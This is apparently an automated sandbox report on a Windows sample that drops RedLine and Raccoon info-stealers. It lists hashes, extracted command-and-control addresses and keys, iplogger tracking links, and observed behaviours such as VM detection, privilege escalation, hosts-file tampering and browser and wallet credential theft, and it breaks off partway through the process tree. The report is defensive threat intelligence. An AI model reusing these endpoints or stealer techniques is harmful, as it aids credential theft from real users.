Analysis
-
max time kernel
105s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 08:45
Static task
static1
Behavioral task
behavioral1
Sample
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
Resource
win10v2004-20220721-en
General
-
Target
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe
-
Size
890KB
-
MD5
185b09878a7c9be2f5ab261f5244a8a0
-
SHA1
2255e5050fc8867ecc7974727dfcad2eb1d8aca0
-
SHA256
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2
-
SHA512
bf9cc4ec025fbacf2c8faaca3f5eb5fda4adb59e2db4bc6ff015f10361e2f54369d597985da72152103fba19eefe3cc762e6b4ca5be413a454c6c1454570967b
Malware Config
Extracted
redline
nam3
103.89.90.61:18728
-
auth_value
64b900120bbceaa6a9c60e9079492895
Extracted
redline
4
31.41.244.134:11643
-
auth_value
a516b2d034ecd34338f12b50347fbd92
Extracted
redline
@tag12312341
62.204.41.144:14096
-
auth_value
71466795417275fac01979e57016e277
Extracted
redline
5076357887
195.54.170.157:16525
-
auth_value
0dfaff60271d374d0c206d19883e06f3
Extracted
redline
alfa
46.175.148.142:32178
-
auth_value
5f6c4b42c0bce31d7557ce1726a401c5
Extracted
raccoon
f0c8034c83808635df0d9d8726d1bfd6
http://45.95.11.158/
Extracted
raccoon
afb5c633c4650f69312baef49db9dfa4
http://77.73.132.74
Signatures
-
Raccoon Stealer payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/6448-258-0x00000000001E0000-0x00000000001EF000-memory.dmp family_raccoon behavioral1/memory/6448-268-0x0000000000400000-0x000000000062B000-memory.dmp family_raccoon behavioral1/memory/5500-279-0x00000000022B0000-0x00000000022C6000-memory.dmp family_raccoon behavioral1/memory/5500-282-0x0000000000400000-0x0000000000482000-memory.dmp family_raccoon behavioral1/memory/6448-288-0x00000000001E0000-0x00000000001EF000-memory.dmp family_raccoon behavioral1/memory/6448-293-0x0000000000400000-0x000000000062B000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 15 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe family_redline C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe family_redline behavioral1/memory/176-166-0x0000000000B70000-0x0000000000BB4000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\safert44.exe family_redline behavioral1/memory/4712-170-0x0000000000330000-0x0000000000374000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\safert44.exe family_redline C:\Program Files (x86)\Company\NewProduct\tag.exe family_redline C:\Program Files (x86)\Company\NewProduct\tag.exe family_redline behavioral1/memory/6800-257-0x0000000000BA0000-0x0000000000BC0000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\jshainx.exe family_redline behavioral1/memory/6680-255-0x0000000000A70000-0x0000000000A90000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\jshainx.exe family_redline C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe family_redline C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe family_redline behavioral1/memory/6956-266-0x0000000000660000-0x0000000000680000-memory.dmp family_redline -
Enumerates VirtualBox DLL files 2 TTPs 10 IoCs
Processes:
svchost.exedescription ioc process File opened (read-only) C:\windows\System32\vboxoglpassthroughspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxdisp.dll svchost.exe File opened (read-only) C:\windows\System32\vboxhook.dll svchost.exe File opened (read-only) C:\windows\System32\vboxmrxnp.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglarrayspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglpackspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxogl.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglcrutil.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglerrorspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglfeedbackspu.dll svchost.exe -
Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
Processes:
svchost.exedescription ioc process File opened (read-only) C:\windows\System32\Drivers\VBoxMouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxGuest.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxSF.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxVideo.sys svchost.exe -
Looks for VirtualBox executables on disk 2 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process File opened (read-only) C:\windows\System32\vboxservice.exe svchost.exe File opened (read-only) C:\windows\System32\vboxtray.exe svchost.exe File opened (read-only) C:\windows\System32\VBoxControl.exe svchost.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 13 IoCs
Processes:
namdoitntn.exereal.exesafert44.exekukurzka9000.exeF0geI.exetag.exejshainx.exeMouseAtHome.exeme.exeWindowsDefender.exeWindows.exeWindows Defender.exesvchost.exepid process 176 namdoitntn.exe 5080 real.exe 4712 safert44.exe 5500 kukurzka9000.exe 6448 F0geI.exe 6680 tag.exe 6800 jshainx.exe 6956 MouseAtHome.exe 7056 me.exe 3688 WindowsDefender.exe 3628 Windows.exe 1256 Windows Defender.exe 6188 svchost.exe -
Looks for VMWare drivers on disk 2 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process File opened (read-only) C:\windows\System32\Drivers\vmusbmouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\Vmmouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\vmci.sys svchost.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1184 takeown.exe 3664 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/3628-315-0x0000000000400000-0x0000000000736000-memory.dmp upx behavioral1/memory/3628-319-0x0000000000400000-0x0000000000736000-memory.dmp upx behavioral1/memory/6188-328-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmp upx behavioral1/memory/6188-330-0x00007FF68EAF0000-0x00007FF68EE6B000-memory.dmp upx -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WindowsDefender.exe125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exeMouseAtHome.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation WindowsDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation MouseAtHome.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1184 takeown.exe 3664 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 6308 set thread context of 2356 6308 conhost.exe conhost.exe -
Drops file in Program Files directory 12 IoCs
Processes:
Windows.exe125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exesetup.exedescription ioc process File created C:\Program Files\Google\Chrome\Application\launcher.exe Windows.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\F0geI.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220809104555.pma setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\me.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\ed9cd2bb-02c7-4e5b-9e76-d145a403ae3a.tmp setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\real.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\safert44.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\tag.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jshainx.exe 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1116 sc.exe 5728 sc.exe 4092 sc.exe 3000 sc.exe 5380 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 6808 6448 WerFault.exe F0geI.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
real.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString real.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 real.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 7160 reg.exe 4088 reg.exe 5616 reg.exe 4348 reg.exe 2476 reg.exe 3140 reg.exe 6000 reg.exe 5640 reg.exe 6112 reg.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
Processes:
msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exereal.exeidentity_helper.exetag.exejshainx.exesafert44.exeMouseAtHome.exeWindows.exepowershell.exenamdoitntn.exepowershell.exesvchost.exepowershell.execonhost.exepowershell.exepid process 5240 msedge.exe 5240 msedge.exe 5248 msedge.exe 5248 msedge.exe 5552 msedge.exe 5552 msedge.exe 5764 msedge.exe 5764 msedge.exe 5560 msedge.exe 5560 msedge.exe 5568 msedge.exe 5568 msedge.exe 5536 msedge.exe 5536 msedge.exe 5544 msedge.exe 5544 msedge.exe 2032 msedge.exe 2032 msedge.exe 5080 real.exe 5080 real.exe 4704 identity_helper.exe 4704 identity_helper.exe 6680 tag.exe 6680 tag.exe 6800 jshainx.exe 6800 jshainx.exe 4712 safert44.exe 4712 safert44.exe 6956 MouseAtHome.exe 6956 MouseAtHome.exe 3628 Windows.exe 3628 Windows.exe 6012 powershell.exe 6012 powershell.exe 6012 powershell.exe 176 namdoitntn.exe 176 namdoitntn.exe 7004 powershell.exe 7004 powershell.exe 7004 powershell.exe 6188 svchost.exe 6188 svchost.exe 5520 powershell.exe 5520 powershell.exe 5520 powershell.exe 6308 conhost.exe 6308 conhost.exe 5200 powershell.exe 5200 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe 2032 msedge.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
tag.exejshainx.exesafert44.exeMouseAtHome.exepowershell.exenamdoitntn.exepowershell.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exedescription pid process Token: SeDebugPrivilege 6680 tag.exe Token: SeDebugPrivilege 6800 jshainx.exe Token: SeDebugPrivilege 4712 safert44.exe Token: SeDebugPrivilege 6956 MouseAtHome.exe Token: SeDebugPrivilege 6012 powershell.exe Token: SeDebugPrivilege 176 namdoitntn.exe Token: SeDebugPrivilege 7004 powershell.exe Token: SeDebugPrivilege 5520 powershell.exe Token: SeDebugPrivilege 6308 conhost.exe Token: SeShutdownPrivilege 3520 powercfg.exe Token: SeCreatePagefilePrivilege 3520 powercfg.exe Token: SeShutdownPrivilege 3176 powercfg.exe Token: SeCreatePagefilePrivilege 3176 powercfg.exe Token: SeShutdownPrivilege 3876 powercfg.exe Token: SeCreatePagefilePrivilege 3876 powercfg.exe Token: SeShutdownPrivilege 5740 powercfg.exe Token: SeCreatePagefilePrivilege 5740 powercfg.exe Token: SeDebugPrivilege 5200 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msedge.exepid process 2032 msedge.exe 2032 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exedescription pid process target process PID 2388 wrote to memory of 3484 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 3484 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 1468 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 1468 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 1468 wrote to memory of 2532 1468 msedge.exe msedge.exe PID 1468 wrote to memory of 2532 1468 msedge.exe msedge.exe PID 2388 wrote to memory of 4436 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 4436 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 3484 wrote to memory of 4836 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4836 3484 msedge.exe msedge.exe PID 4436 wrote to memory of 4988 4436 msedge.exe msedge.exe PID 4436 wrote to memory of 4988 4436 msedge.exe msedge.exe PID 2388 wrote to memory of 4596 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 4596 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 4596 wrote to memory of 4204 4596 msedge.exe msedge.exe PID 4596 wrote to memory of 4204 4596 msedge.exe msedge.exe PID 2388 wrote to memory of 4344 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 4344 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 4344 wrote to memory of 4888 4344 msedge.exe msedge.exe PID 4344 wrote to memory of 4888 4344 msedge.exe msedge.exe PID 2388 wrote to memory of 2032 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 2032 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2032 wrote to memory of 4356 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 4356 2032 msedge.exe msedge.exe PID 2388 wrote to memory of 4064 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 4064 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 4064 wrote to memory of 4944 4064 msedge.exe msedge.exe PID 4064 wrote to memory of 4944 4064 msedge.exe msedge.exe PID 2388 wrote to memory of 1120 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 2388 wrote to memory of 1120 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe msedge.exe PID 1120 wrote to memory of 3468 1120 msedge.exe msedge.exe PID 1120 wrote to memory of 3468 1120 msedge.exe msedge.exe PID 2388 wrote to memory of 176 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe namdoitntn.exe PID 2388 wrote to memory of 176 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe namdoitntn.exe PID 2388 wrote to memory of 176 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe namdoitntn.exe PID 2388 wrote to memory of 5080 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe real.exe PID 2388 wrote to memory of 5080 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe real.exe PID 2388 wrote to memory of 5080 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe real.exe PID 2388 wrote to memory of 4712 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe safert44.exe PID 2388 wrote to memory of 4712 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe safert44.exe PID 2388 wrote to memory of 4712 2388 125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe safert44.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 4596 wrote to memory of 1544 4596 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 4596 wrote to memory of 1544 4596 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe PID 2032 wrote to memory of 1156 2032 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"C:\Users\Admin\AppData\Local\Temp\125d8bd267eeabca39bc31a2cf3471d254bb3f852813eee0ac0542f23f0201b2.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,17767413840200284536,5828161942537074106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,11770811137516348281,4843849023375438019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11887193749477432366,14851517912531595843,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
